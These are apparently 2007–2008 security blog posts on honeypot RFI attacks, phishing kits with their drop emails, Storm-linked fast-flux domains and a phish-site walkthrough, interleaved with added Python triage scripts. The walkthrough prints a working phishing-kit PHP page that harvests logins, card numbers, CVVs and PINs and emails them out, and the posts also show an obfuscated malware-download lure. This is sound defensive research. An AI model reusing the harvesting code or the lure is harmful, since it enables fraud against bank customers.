Friday, February 29, 2008

RFIs and Phishing Tricks

Our honeypots have been hit with a rash of RFIs lately; we count over 1600 attempts from Feb 20 to Feb 29. Some of the most frequently requested URLs (with their hit counts) are listed below.

These are likely automatic crawlers - botnet stuff. We've seen attacks on honeypots that haven't been indexed in almost 6 months.

Thankfully, most of these sites quickly removed the exploit code. Some are still live as of this post. A few of these RFIs are hosted on sites that had been compromised by attackers only hours earlier.

Following some code like this, we spoke with a system administrator who asked to remain anonymous. He kindly offered system logs from a site that we identified as compromised. The site was serving a paypal phish (and has been taken offline).

In the logs were several attempts to download packages from enache.3x.ro. Some investigation revealed that this site held a number of phishing and exploit packages for both Windows and Unix. The site has since been removed by the hosting provider, 3x.ro. Some of the binaries tripped the following AV signatures:
Backdoor.Linux.Phobi.A, Backdoor.Linux.Zorg.B, DOS.Linux.Blitz, Generic.Slapper.E69A1FF5, Generic.XPL.Samba.E2FFD420, Linux.RST.B, Trojan.Dos.Linux.Slice.B, Trojan.Exploit.Linux.Brk.C, Trojan.Exploit.Linux.Brk.D, Trojan.Exploit.Linux.Brk.E, Trojan.Exploit.Linux.Race.B, Trojan.Exploit.Linux.Race.C, Trojan.Flooder.Linux.Silly.B, Trojan.Flooder.Linux.Smurf.B, Trojan.Hacktool.Flood.A, Trojan.Hacktool.Linux.Bf.B, Trojan.Hacktool.Linux.Pscan.A, Trojan.Hacktool.Linux.Small.B, Trojan.Horse.(AV|BU|BY|CA|CB|CC|CE|CF|CI), Trojan.Linux.Hacktop.B, Trojan.Linux.Mircforce.B, Trojan.Linux.Rootkit.C, Trojan.Linux.Rootkit.N, Trojan.Linux.Rootkit.SA, Trojan.Rootkit.Linux.Agent.SH, Trojan.Rootkit.Linux.Agent.Y, Virtool.Linux.Shark.A, Virtool.Linux.Sshscan.A, Win32.Parite.B, Win32.Worm.Linux.Adore.A, Worm.Linux.Lion.A

In total there were over 80 packages on the site. Of those, 14 of them were phishkits:
Arsenal Credit Union (Account Information emailed to mefy12345@gmail.com)
E-Trade (Account information emailed to giianny@yahoo.com)
Paypal (Account information emailed to proces.verbal@yahoo.com or micumicu1@gmail.com)
Banca Intesa (Account information emailed to muielagaborisilavoi@gmail.com)
Mid America Bank (Account information emailed to varu2005@gmail.com or telefon.mobil@yahoo.com)
Poste Italiane (Account information emailed to catalinum@yahoo.com)
First Interstate Bank (Account information emailed to sbrns51@gmail.com)
Gesa Credit Union (Account information emailed to mefy12345@gmail.com)
USF Federal Credit Union (Account information emailed to mist3ry@evoreal.net and k0rd1t@yahoo.com)
Wachovia (Account information emailed to telefon.mobil@yahoo.com or m3fystutzu@yahoo.com)
Capital One (Account information emailed to hai.cu.spamu@gmail.com)
ICBA (Account information emailed to mefy12345@gmail.com)
Oregon Community Credit Union (no email address assigned)
UCCU (Account information emailed to proces.verbal@yahoo.com)
While none of these kits used it, we've noticed that the ED/pharmacy site spam hitting our mailboxes uses a padlock image as its favicon.ico and sports "Hacker Safe" logos - a trick said to be coined by L. Jean Camp.



This image plays on the advice IT people have given for years: watch for the padlock icon to identify secure sites.
I think we need to modify our advice: click the padlock icon, and verify who you're doing business with.
Who knows how many users this has fooled, and how many phishing sites have followed or will follow suit.


Wednesday, January 30, 2008

Pharmacy related sites - the work of CME711?

Over the last few months there have been a large number of domains registered for what appear to be pharmacy-related sites.

Many of the sites are using 5-minute TTLs with multiple A records.

Possibly related, Websense posted this today: http://www.websense.com/securitylabs/blog/blog.php?BlogID=170

Websense believes the spam they have seen is related to Storm/CME711. It's very likely that these domains are also related, but I'm stopping short of claiming that at this time.

~400 examples are:
These domains share many of the same A records, which is what caught my attention.
More information available as soon as I know more.
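The observation above (short TTLs, several A records, and many domains sharing the same addresses) can be turned into a small triage script. The following is an added example, not code from the post; the domains, TTLs and addresses in it are constructed:

```python
from collections import defaultdict

# Constructed observations in the shape the post describes: (domain, TTL in
# seconds, A records). Names and addresses are made up for this example.
OBSERVATIONS = [
    ("pharm-example-a.test", 300, ["192.0.2.10", "192.0.2.11", "192.0.2.12"]),
    ("pharm-example-b.test", 300, ["192.0.2.11", "192.0.2.12", "192.0.2.13"]),
    ("pharm-example-c.test", 300, ["192.0.2.10", "192.0.2.13", "192.0.2.14"]),
    ("unrelated-corp.test", 86400, ["198.51.100.5"]),
    ("unrelated-blog.test", 3600, ["198.51.100.6", "198.51.100.7"]),
]

def flux_like(ttl, a_records, max_ttl=300, min_records=2):
    """The post's heuristic: a short TTL combined with several A records."""
    return ttl <= max_ttl and len(a_records) >= min_records

def shared_ip_clusters(observations):
    """Group domains linked through common A records (inverted index IP -> domains,
    merged transitively with union-find), so one pool of nodes becomes one cluster
    even when no single address appears in every answer. Singletons are dropped."""
    parent = {domain: domain for domain, _, _ in observations}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    by_ip = defaultdict(set)
    for domain, _, records in observations:
        for ip in records:
            by_ip[ip].add(domain)
    for domains in by_ip.values():
        first, *rest = sorted(domains)
        for other in rest:
            parent[find(other)] = find(first)

    clusters = defaultdict(set)
    for domain in parent:
        clusters[find(domain)].add(domain)
    return sorted(sorted(c) for c in clusters.values() if len(c) > 1)

def suspicious_domains(observations):
    """Domains that both look flux-like and share infrastructure with others."""
    clustered = {d for cluster in shared_ip_clusters(observations) for d in cluster}
    return sorted(d for d, ttl, recs in observations
                  if d in clustered and flux_like(ttl, recs))
```

Feeding it live resolver output (domain, TTL, A records) instead of the constructed list reproduces the check the post describes.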


Tuesday, January 15, 2008

CME711: Happy Valentines Day and Halifax phish

The CME711 gang has changed their tactics again. We've started seeing emails in our mail drops with pointers to nodes serving "withlove.exe" and "with_love.exe".

So far they have reverted to sending IP addresses in the email body, which makes it easy for most spam filters to catch.

The website code looks the same as in previous runs, with false binaries in comments and the greeting:

Your download should begin shortly. If your download does not start
in 10-20 seconds, you can click here to launch the download
and then press Run


The link is generated by a snippet of javascript: document.write( unescape( '%3C%61%20%68%72%65%66%3D%22%77%69%74%68%5F%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A' ) );

That javascript translates to withlove.exe. Additionally, there is an image of a pink heart on the page that links to with_love.exe. You may wish to update your Snort signatures.
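To see exactly what that document.write call emits, here is an added example (not code from the post) that mimics JavaScript's legacy unescape() and pulls any .exe hrefs out of the decoded markup. The surrounding HTML is constructed around the escaped string quoted above:

```python
import re
from html.parser import HTMLParser

# Constructed page fragment embedding the exact escaped string from the post.
SAMPLE_HTML = """<html><body>
<p>Your download should begin shortly.</p>
<script>document.write( unescape( '%3C%61%20%68%72%65%66%3D%22%77%69%74%68%5F%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A' ) );</script>
</body></html>"""

_JS_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
_DOC_WRITE = re.compile(r"document\.write\s*\(\s*unescape\s*\(\s*['\"]([^'\"]*)['\"]", re.I)

def js_unescape(s):
    """Mirror JavaScript's legacy unescape(): %XX and %uXXXX become single code
    units. Unlike urllib.parse.unquote it does no UTF-8 decoding and leaves '+' alone."""
    return _JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

class _HrefCollector(HTMLParser):
    """Collect href values from <a> tags in a decoded fragment."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)

def decoded_writes(html):
    """Return the text each document.write(unescape('...')) would emit."""
    return [js_unescape(m.group(1)) for m in _DOC_WRITE.finditer(html)]

def hidden_exe_links(html):
    """hrefs ending in .exe that only exist once the escaped markup is decoded,
    i.e. links a signature matching the raw page source would never see."""
    found = []
    for fragment in decoded_writes(html):
        collector = _HrefCollector()
        collector.feed(fragment)
        found.extend(h for h in collector.hrefs if h.lower().endswith(".exe"))
    return found
```

The decoded fragment is an anchor tag whose href is with_love.exe, followed by a CRLF.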

Additionally, we're tracking a phish using Storm Worm fast-flux nodes with the domain ibank-halifax.com.


Monday, November 19, 2007

Walking through a phish site.

I just received this email in my inbox and figured some readers would enjoy some light reading.

Online Banking

Dear Regions Bank member,


We'd like to inform you that your Message Center has 1 new message. Please log in immediately and read the message. The Message Center contains only important information about your account and online banking.

Please follow this link in order to read your message:

http://tinyurl.com/2qzwsr

Choosing to ignore this message will result in a temporary suspension of your account within 24 hours, until you will choose to solve this unpleasant situation.

Sincerely,
RegionsNet Online Banking
All of my phish emails go to CastleCops, and I enjoy helping them out by doing the first bit of research on my own. I started by figuring out where the TinyURL is pointing. You can do this by setting a cookie "preview=1" before visiting the page, fetching the page with wget, or running a proxy like Paros or WebScarab. According to TinyURL, the 2qzwsr redirect points to "http:// backup.iirt .net/ icons/ www.regions bank.com/ EBanking/ logon/" where we are greeted with:


Now phishers aren't the brightest bunch. In fact, the majority of them are downright stupid. By backing up a few directories, we're able to find an open index. It was probably left open accidentally by the web master. The stupid part is, the phisher didn't even bother to remove his kit: "http://backup. iirt.net/ icons/ regions.tgz"

In the archive we find: /www.regionsbank.com/EBanking/logon/done.php:



<?php
session_start();

// The login page of the kit captured the username and password and stashed
// them in the session; this second page collects the rest of the profile.
$j_username = $_SESSION['j_username'];
$j_password = $_SESSION['j_password'];
// $HTTP_POST_VARS / $HTTP_SERVER_VARS are the old long-form names for $_POST / $_SERVER.
$name = $HTTP_POST_VARS['name'];
$address = $HTTP_POST_VARS['address'];
$city = $HTTP_POST_VARS['city'];
$state = $HTTP_POST_VARS['state'];
$zip = $HTTP_POST_VARS['zip'];
$p1 = $HTTP_POST_VARS['p1'];
$p2 = $HTTP_POST_VARS['p2'];
$p3 = $HTTP_POST_VARS['p3'];
$card = $HTTP_POST_VARS['card'];
$expm = $HTTP_POST_VARS['expm'];
$expy = $HTTP_POST_VARS['expy'];
$cvv = $HTTP_POST_VARS['cvv'];
$pin = $HTTP_POST_VARS['pin'];
$ip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
$date = date("D M d, Y g:i a");

//sending email info here
$subj = "| CC: $card | EXP: $expm/$expy | CVV: $cvv | PIN: $pin |";
$msg = "Username: $j_username\nPassword: $j_password\nCardHolder Name: $name\nAddress: $address\nCity: $city\nState: $state\nZip: $zip\nPhone Number: $p1-$p2-$p3\nCredit Card Number: $card\nExpiration Date: $expm / $expy\nCvv: $cvv\nPin: $pin\n\n[ IP: $ip | $date ]";
$from = "From: Regions Bank";
mail("peacolo3@yahoo.com", $subj, $msg, $from);
// Bounce the victim to the real bank site so nothing looks out of place.
header("Location: http://www.regions.com");

?>
So victim data is emailed to peacolo3@yahoo.com. We could send Mr Peacolo a nice email, but that could be considered baiting him...and we'd never do that..right? :)
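For the first-pass triage an incident responder does on a recovered kit like this one, here is an added example (not code from the post) that pulls the drop addresses, the harvested form fields and the post-submit redirect out of PHP source. The kit excerpt it runs on is constructed, with a placeholder drop address:

```python
import re

# Constructed excerpt in the shape of the kit's done.php (placeholder address).
SAMPLE_KIT = r'''<?php
session_start();
$j_username = $_SESSION['j_username'];
$card = $HTTP_POST_VARS['card'];
$cvv = $HTTP_POST_VARS['cvv'];
$pin = $_POST['pin'];
$subj = "| CC: $card | CVV: $cvv |";
mail("drop-placeholder@example.com", $subj, $msg, $from);
header("Location: http://www.example.com");
?>'''

# mail() with a literal recipient as its first argument.
_MAIL_CALL = re.compile(r"\bmail\s*\(\s*(['\"])([^'\"]+)\1", re.I)
# Request fields read via the modern or the legacy superglobals.
_HARVEST = re.compile(
    r"\$(?:_POST|_GET|_REQUEST|HTTP_POST_VARS|HTTP_GET_VARS)\s*\[\s*(['\"])([^'\"]+)\1\s*\]")
# Where victims are sent after the form is submitted.
_REDIRECT = re.compile(r"header\s*\(\s*(['\"])Location:\s*([^'\"]+)\1", re.I)
# Fallback: any e-mail literal, for kits that put the recipient in a variable.
_EMAIL = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

def triage_kit(source):
    """Return the indicators reported first from a PHP phishing-kit page."""
    return {
        "drop_addresses": sorted({m.group(2) for m in _MAIL_CALL.finditer(source)}),
        "email_literals": sorted(set(_EMAIL.findall(source))),
        "harvested_fields": sorted({m.group(2) for m in _HARVEST.finditer(source)}),
        "redirects_to": [m.group(2) for m in _REDIRECT.finditer(source)],
    }
```

Run over the real done.php, the drop address is what goes into the abuse report to the mail provider and the redirect target confirms which brand is being impersonated.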

Emails were sent to hostmaster@iirt.net and the phish was forwarded to CastleCops.

So grab your line and go anti-phishing. For what it's worth, TinyURL killed the site while I was writing this. Good job, TinyURL.
